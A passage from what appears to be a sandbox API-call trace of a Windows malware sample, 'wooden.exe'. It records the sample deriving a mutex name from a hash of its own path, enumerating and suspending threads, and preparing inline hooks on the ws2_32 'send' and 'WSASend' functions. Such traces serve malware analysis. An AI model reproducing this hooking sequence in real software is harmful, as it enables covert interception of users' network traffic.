phHash=0x221f988 | out: phHash=0x221f988) returned 1 [0172.685] lstrlenA (lpString="C:\\Program Files\\Windows Journal\\wooden.exe37084212416043") returned 57 [0172.685] CryptHashData (hHash=0xa51418, pbData=0xa509b0, dwDataLen=0x39, dwFlags=0x0) returned 1 [0172.685] CryptGetHashParam (in: hHash=0xa51418, dwParam=0x2, pbData=0x221f974, pdwDataLen=0x221f98c, dwFlags=0x0 | out: pbData=0x221f974, pdwDataLen=0x221f98c) returned 1 [0172.686] wsprintfA (in: param_1=0xa509b0, param_2="%02X" | out: param_1="20") returned 2 [0172.686] wsprintfA (in: param_1=0xa509b2, param_2="%02X" | out: param_1="2B") returned 2 [0172.686] wsprintfA (in: param_1=0xa509b4, param_2="%02X" | out: param_1="6F") returned 2 [0172.686] wsprintfA (in: param_1=0xa509b6, param_2="%02X" | out: param_1="D8") returned 2 [0172.686] wsprintfA (in: param_1=0xa509b8, param_2="%02X" | out: param_1="8E") returned 2 [0172.686] wsprintfA (in: param_1=0xa509ba, param_2="%02X" | out: param_1="78") returned 2 [0172.686] wsprintfA (in: param_1=0xa509bc, param_2="%02X" | out: param_1="C1") returned 2 [0172.686] wsprintfA (in: param_1=0xa509be, param_2="%02X" | out: param_1="71") returned 2 [0172.686] wsprintfA (in: param_1=0xa509c0, param_2="%02X" | out: param_1="2F") returned 2 [0172.686] wsprintfA (in: param_1=0xa509c2, param_2="%02X" | out: param_1="7F") returned 2 [0172.686] wsprintfA (in: param_1=0xa509c4, param_2="%02X" | out: param_1="81") returned 2 [0172.686] wsprintfA (in: param_1=0xa509c6, param_2="%02X" | out: param_1="C7") returned 2 [0172.686] wsprintfA (in: param_1=0xa509c8, param_2="%02X" | out: param_1="C9") returned 2 [0172.686] wsprintfA (in: param_1=0xa509ca, param_2="%02X" | out: param_1="F0") returned 2 [0172.686] wsprintfA (in: param_1=0xa509cc, param_2="%02X" | out: param_1="EE") returned 2 [0172.686] wsprintfA (in: param_1=0xa509ce, param_2="%02X" | out: param_1="D3") returned 2 [0172.686] CryptDestroyHash (hHash=0xa51418) returned 1 [0172.686] CryptReleaseContext (hProv=0xa50b00, dwFlags=0x0) returned 1 [0172.686] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="202B6FD88E78C1712F7F81C7C9F0EED3") returned 0x80 [0172.686] GetLastError () returned 0x0 [0172.686] Sleep (dwMilliseconds=0x1f4) [0173.225] GetCurrentProcessId () returned 0x644 [0173.225] GetCurrentThreadId () returned 0xb48 [0173.225] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x88 [0173.228] Thread32First (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.228] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.228] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.228] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.229] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.229] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.229] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.230] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.230] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.230] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.230] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.231] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.231] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.232] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.232] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.232] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.232] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.233] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.233] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.233] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.233] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.234] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.234] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.234] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.235] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.235] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.235] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.235] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.236] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.236] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.236] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.236] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.237] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.237] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.237] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.238] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.238] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.238] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.238] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.239] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.239] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.239] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.239] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.240] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.240] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.240] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.241] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.241] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.241] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.241] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.242] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.242] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.242] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.242] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.243] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.243] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.243] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.244] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.244] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.244] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.244] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.245] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.245] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.245] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.246] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.246] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.246] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.246] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.247] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.247] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.247] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.247] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.248] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.248] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.248] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.248] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.249] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.249] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.249] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.250] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.250] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.250] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.250] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.251] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.251] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.251] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.251] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.252] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.252] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.252] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.253] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.253] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.253] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.253] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.254] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.254] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.254] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.254] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.255] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.255] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.255] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.255] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.256] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.256] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.256] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.257] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.257] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.257] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.257] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.258] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.258] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.258] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.258] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.259] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.259] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.259] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.260] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.260] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.260] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.260] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.261] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.261] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.261] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.261] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.262] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.262] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.262] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.263] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.263] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.263] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.263] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.264] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.264] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.264] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.264] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.265] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.265] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.265] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.266] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.266] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.266] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.266] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.267] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.267] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.267] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.267] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.268] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.268] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.268] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.269] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.269] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.269] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.269] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.270] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.270] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.270] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.270] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.271] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.271] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.271] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.271] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.272] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.272] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.272] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.273] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.273] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.273] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.273] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.274] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.274] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.274] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.274] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.275] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.275] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.275] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.275] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.276] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.276] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.276] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.277] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.277] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.277] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.277] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.278] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.278] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.278] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.279] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.279] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.279] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.279] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.280] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.280] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.280] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.280] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.281] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.281] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.281] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.282] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.282] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.282] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.282] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.283] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.283] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.283] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.283] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.284] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.284] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.284] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.284] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.285] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.285] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.285] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.286] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.286] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.286] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.286] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.287] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.287] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.287] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.287] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.288] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.288] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.288] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.288] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.289] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.289] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.289] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.290] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.290] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.290] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.290] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.291] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.291] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.291] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.291] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.292] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.292] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.292] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.292] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.293] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.293] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.293] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.294] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.294] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.294] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.294] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.295] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.295] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.295] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.295] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.313] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x30c) returned 0x8c [0173.313] SuspendThread (hThread=0x8c) returned 0x0 [0173.314] CloseHandle (hObject=0x8c) returned 1 [0173.314] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9a0) returned 0x8c [0173.314] SuspendThread (hThread=0x8c) returned 0x0 [0173.314] CloseHandle (hObject=0x8c) returned 1 [0173.336] CloseHandle (hObject=0x88) returned 1 [0173.336] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0173.336] GetProcAddress (hModule=0x75bc0000, lpProcName="send") returned 0x75bc6f01 [0173.337] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0xe4224 | out: lpflOldProtect=0xe4224*=0x20) returned 1 [0173.337] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0xf0000 [0173.337] RtlMoveMemory (in: Destination=0xf0000, Source=0x75bc6f01, Length=0x5 | out: Destination=0xf0000) [0173.337] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0xe4224 | out: lpflOldProtect=0xe4224*=0x40) returned 1 [0173.343] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0173.343] GetProcAddress (hModule=0x75bc0000, lpProcName="WSASend") returned 0x75bc4406 [0173.343] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0xe4224 | out: lpflOldProtect=0xe4224*=0x20) returned 1 [0173.343] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x100000 [0173.343] RtlMoveMemory (in: Destination=0x100000, Source=0x75bc4406, Length=0x5 | out: Destination=0x100000) [0173.344] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0xe4224 | out: lpflOldProtect=0xe4224*=0x40) returned 1 [0173.351] GetCurrentProcessId () returned 0x644 [0173.351] GetCurrentThreadId () returned 0xb48 [0173.351] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x88 [0173.353] Thread32First (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.353] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.353] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.353] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.354] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.354] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.354] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.355] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.355] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.383] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.383] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.383] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.383] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.384] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.384] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.384] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.384] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.385] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.385] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.385] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.386] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.386] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.386] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.386] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.387] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.387] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.387] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.388] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.388] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.388] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.388] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.389] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.389] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.389] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.389] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.390] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.390] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.390] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.391] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.391] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.391] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.391] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.392] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.392] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.392] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.392] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.393] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.393] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.393] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.393] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.394] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.394] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.394] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.395] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.395] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.395] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.395] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.396] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.396] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.396] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.396] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.397] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.397] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.397] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.398] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.398] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.398] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.398] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.399] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.399] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.399] Thread32Next (hSnapshot=0x88, lpte=0x221f978) returned 1 [0173.399] Thread32Next 